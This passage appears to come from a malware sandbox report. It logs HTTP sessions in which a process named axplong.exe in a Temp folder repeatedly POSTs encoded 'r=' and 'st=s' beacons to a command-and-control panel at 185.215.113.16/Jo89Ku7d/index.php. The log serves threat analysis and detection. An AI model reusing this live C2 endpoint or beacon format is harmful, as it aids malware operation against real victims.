Jul 26, 2024 21:00:19.170006990 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:19.937151909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.6	51151	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:20.061855078 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:20.857263088 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.6	51152	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:20.867443085 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:21.668042898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.6	51154	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:21.808960915 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:22.596292019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.6	51155	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:22.714916945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:23.485802889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.6	51156	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:23.497180939 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:24.299350977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.6	51157	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:24.489623070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:25.318515062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.6	51158	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:25.426733971 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:26.426301956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.6	51159	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:26.540832043 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:27.329745054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.6	51160	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:27.355459929 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:28.143049002 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.6	51161	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:28.288142920 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:29.105829954 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	51162	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:29.131510973 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:29.951849937 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	51163	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:30.076989889 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:30.850505114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	51165	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:30.980807066 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:31.837157965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	51166	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:31.856188059 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:32.659017086 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	51167	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:32.796981096 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:33.558598995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	51168	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:33.569848061 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:34.375782013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	51169	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:34.493619919 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:35.282812119 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	51170	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:35.293651104 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:36.257325888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	51171	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:36.369342089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:37.266617060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.6	51172	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:37.276602030 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 21:00:38.076704979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	51173	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:38.205142021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:00:38.960272074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:00:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	51174	185.215.113.16	80	7036	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:00:38.970710039 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
